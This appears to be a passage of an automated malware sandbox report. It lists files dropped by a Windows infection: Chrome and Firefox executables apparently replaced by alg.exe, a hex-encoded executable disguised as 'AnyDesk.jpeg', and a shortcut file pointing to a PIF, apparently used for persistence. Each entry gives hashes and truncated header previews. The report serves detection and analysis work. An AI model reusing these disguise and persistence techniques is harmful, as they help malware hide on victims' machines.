                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.1043466284375425
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:DwbK7tnhD4aH6wD2Krx5NgOOagWE842sqjnhMgeiCl7G0nehbGZpbD:DSK7Fhslq2EPfOQEmDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:EBA91F9B5C3D0D5BF0CE0A1235AC7845
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2B809E525D95317CCDB71D7BACA037E24884C23E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:68CE45B9C06AB03FCB319563AB0E5824154B8D0D619B5E7C2F40A57616F09CD1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:349973902D8471A4CD677D9E770C748BC5108EC298A6A2625B78DA6DB164E11934F6AB5F4C7CE6D9466F2278F8220BB773B4216D28076909D733BB137BEF4C00
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@....................................._.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.158079769787743
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:2KI7Twj5KDHxJ1FxyD+/wsG1pbbxGsqjnhMgeiCl7G0nehbGZpbD:2v7e0j31mD+/wDxb8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7F964A237EA4A90EFA59E6CD021131A7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:356232427F302A058B48D3CF2B9D936A858C70A9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:14B621F7F928DDA5BD3F89F1EEFC298AE0797569E0ADC02C584EE92DABF3A773
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:91A4EACF50D71811FFBAA3A20790B158B047478E0CDC1E37F49FC778D9537236984E92B21C5F1957A4AFD6F6092801889657F6495088E0EC258D76802C5DCDCB
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.377442027750052
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:pQUVPDHhS9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:6yhS9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6BCD1E4E7E5CEB44EED2F78DA1D1AF75
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:983DC407EA75D9E04E722DE8C5642A034CE961CD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:1DC6D352585C3BBF3538CDAC33A132FC53B7547642D53089351768800870B511
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C2664C9B5A7D2388FF56757B26C5F11C36CEA9AF512F7628F05E573DE5890BFD57784BB7ED449360B7A1C97C6CE14E6E7EE7F3CC3562EDBAEC91E930FB8D9719
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......J..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.222128058803493
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:6sFfc1VyFn5UQn652bO4HesqjnhMgeiCl7G0nehbGZpbD:6sFcIn5rJ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:5D0B374A575EFB1992A1F53872063209
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:20A7BF9F99D4FFD3577A81B12C09B0D74E07EC91
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:DC3D9C877C1F9F8D3D5C47B2D5C8F135B183F91842F038912AFC4EA5FE7A24CD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D3DA8B5D205F8B6BD48DC52334CDD6F1ABAD81ACEAFF93E4FF5189AA4EEC86EAEC2356DA75B37C6776EFA671114FD8E1FACFA0EE8F9FBD19683DEDE1F9562701
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.494283146897805
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:tt9o6p4xQbiKI69wpemIwpel9xsqjnhMgeiCl7G0nehbGZpbD:tt9faQbtl2peapelXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:AAFCA44A46453E9DAF0D1E58251965C7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D27C6D943044403A62876D6D2067004FFA758549
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:86488C6F75200653A00B437D8F62C725F2B4772BF0BD1D57F00198C17750FBF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:25A8122C0DFD350351AEE1613FA083AB08AA971A5BEBDCFFDC304D5327D074EAA9EC66DC0E159B870499DA7A6645C16D49592237259951688EA5263B1AE47DD7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................9.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.347845054953299
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:UQVTZu0JmsqjnhMgeiCl7G0nehbGZpbD:rVTZuHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B4CF47CF3D0A71AD847ECBDC9D6D73C3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:26EE11D170A58049302DCABFA2A90C41DAB8F78B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3FE77E25E53717355BEEA1A6C4C8C5129D82D004BE9C15252D25C6F84DD03DDC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:42E4422417A2ECB1A7ED4A7BD4D70158C7FF158C5D651C57E44A308D3C822C4F3EFEAFDA2D651E04CB71406D6768DD8FA6B60C2A43DE75340567AFDBAF423F82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......Q|.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.808393235892336
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:uC1vpgXcZHzwsqjnhMgeiCl7G0nehbGZpbD:uC1vpIcNsDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7010EF812B3EAFB7EE931542166B85F5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:288C14E38D89767B830C936DE10B2A8CD136894D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5DD26B60F222DFD3C4A01E7C86A284E0C70DB1ADFEE994D2F767E028F52A7780
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:90B648BEE75A699BE8D4F154410D3B3B3D9E56E2BD397F3C498501AFCF19DB31281EAE52597C5A6425C59E0DC1FC3446EF03C4C2AEDAF54CCAE675B9FCEFD02F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.140024989999147
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:nSwjUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nvUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:01B4D6AF83CC80557DDB989D1FBC5917
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DD9E3D562A813F64F3C71585F631150D368681DC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:CD9628BCF762A6F054C2DD1B423B5E02BA1E8D68CBFEA934FCAE961854E0A39D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:63ACD90204E10A240E0A80F3E0603C73594F3509E5CE5196EC8080B19B7F206A499F3CD25E7EF48D8DD9EC4DFE071C68E7D7C2545C09D81BF9C10BB2EE924920
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................`.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.441160954505017
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:fWKntIfGp2sqjnhMgeiCl7G0nehbGZpbD:e8IeUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3C42D731FEF67186CC4E03B85E7C1446
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5DA63CA363DE69B4127DA35B2FC1FD91073C44A6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9F3F75494D46237C8897E95B2258ECFB49FE165BB9FF4BCDDB06B923167C2DEF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2D89268949A1F36AD7C1183B2545CFCE97C1A0247FA5135786FE773657E9E3375EE86C3959E6A35CBDFAECDA39475BDDC276DD0BB925CC9113E4A6A45A191C51
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................Q.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.10328879055272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:/IhIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E6C9D7DDD6B5C98B6FE0B6845341192B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AA3A1395D3B4262DCB1E9E295C2A88366364064
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D42FE0EEDD91C368E34FDAE0C5C7E9F20182F0BA1F4D401632984A560882B03E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:23742B71EE94BEEFF253E5B2DD7BDCA8E7575D27E2B60CE361B02F5A38776847F4B6C193F4655AB89FC9C085F9EEFC57E33A673F7A009DD7B033035EE282729F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................3..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.421208869907433
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:X8oREwt2ioQ3J+RBsqjnhMgeiCl7G0nehbGZpbD:X8oRpoFVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7F0E276703F0B57ED8F9BAA6A24800A1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1D767F4080A158AC2DE965781621B6F1DF10B5C8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9D51FB7FCF31F7F1B15B2F8AE02E9296A0229BBB906559AB558148CD97645297
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:94F9F444FA8FE8AA63ACE0AADC088683629BDF911B0A3EF081BD4F9EA736E5A571BED1BF967C6FD72679431AB28DECC477DC3D05A6DFF51FB18A853789D31AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................Ok.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\AnyDesk.jpeg

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2479106
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9372326492831413
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Q1EeVPYKxSEyKFeooniPF497XZnLfT8NI1dMPKLcAuaX3DucoDZxTM404oE4AeBb:L
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B25F8B243FA4E165791EF4DB2ED58251
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:CF923845AAC7EE38EADDEA46069A98EB3E1F2AD1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:564768D36462EB6B5ED7C299F612ECDE7938A9F7B239BDC116F730E13FA4203E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C6FB85ECD6A48266807A89A64FD52962A1D3E4413FDEAF5A90F400CD6ABF9EC7379E7C38EEA013A8E54BA8B0F0AD86307FEB40D08BB71B13A96012D15E38C28B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900f0050000f60c00000000005407060000100000001006000000400000100000000200000400000000000000040000000000000000801300000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000000700bc24000000c0070000b20b000000000000000000000000000000000000500700646b0000000000000000000000000000000000000000000000000000004007001800000000000000000000000000000000000000d4060700bc0500000000000000000000000000000000000000000000

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Juqmtmya.url

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.168706785966594
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbx3c+1A5ov:HRYFVmTWDyzmBsOEx3cb2v
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:40DFFE3F287ED95CF512581802C9551D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:3F6E26F7BD09F91DE5AC4AFE99BDD8D68088D368
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4F682A654AC9DD9E1D155074371406581018431DE47EE5865AC818CC9F3C91A8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FD3731689EF5048396277DD0762B7DB93F63278FC0BA465F10255237C8C70771B67C2274DAF39245EF9F0F6C09356307C770AEDF44DCA596F68E52F633CCF5B5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=949965..HotKey=80..

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\AnyDesk.PIF

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1239552
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.46367308768617
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:8sqCMKzL0rxr152qsNa6HR2zlPQxL/F99UljJes8lSnQ:85KMXANYOLSes8lSQ
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E02910D2D83F40FAEF8719A99EE0EF5B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:49F932B32703D21B2041F36829D87353E64AE685
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:326A9344D8D5CE3E59D1C8560043D4EBD87BA53B732B635FAB2D8AFA210C5C05
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A55D2321FE633CAE781B5868763C9F778B3413D24AA0C83A99BD4E12BD489EC2CBAC3BCA1FEA04A8233A542FBF609B33DB697E32180D3948DEDA723B096F60B2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..............................................@...............................$...........................P..dk...........................@.......................................................text...h........................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...$.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc..dk...P...l..................@..B.rsrc................8..............@..@....................................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\Juqmtmya

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
